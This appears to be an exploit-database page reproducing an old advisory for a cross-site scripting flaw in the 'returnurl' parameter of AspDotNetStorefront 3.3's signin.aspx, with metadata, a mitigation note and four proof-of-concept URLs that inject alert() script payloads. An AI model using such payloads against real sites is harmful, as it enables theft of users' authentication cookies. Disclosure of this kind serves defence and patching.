header-logo
Suggest Exploit
vendor:
AspDotNetStorefront
by:
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: AspDotNetStorefront
Affected Version From: AspDotNetStorefront 3.3
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:aspdotnetstorefront:aspdotnetstorefront:3.3
Metasploit:
Other Scripts:
Platforms Tested:

Cross-Site Scripting vulnerability in AspDotNetStorefront

The 'returnurl' parameter in the 'signin.aspx' script of AspDotNetStorefront is not properly sanitized, allowing remote attackers to execute malicious JavaScript code and steal user authentication credentials.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input before using it in HTML or JavaScript context. AspDotNetStorefront should update their code to properly sanitize the 'returnurl' parameter.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10507/info

AspDotNetStorefront is prone to a cross-site scripting vulnerability. This issue exists due to insufficient sanitization of user-supplied data. The problem presents itself in the 'returnurl' parameter of the 'signin.aspx' script of the application and can allow remote attackers to steal cookie-based authentication credentials and carry out other attacks.

AspDotNetStorefront 3.3 is reportedly affected by this issue, however, it is possible that other versions are affected as well.

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=1"style=
"background:url(javascript:alert('Vulnerable_To_XSS'))"%20"

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=--><scri
pt>alert('Vulnerable_To_XSS')</script>

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"><scri
pt>alert("Vulnerable_To_XSS")</script>

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"'><img
%20src="javascript:alert('Vulnerable_To_XSS')">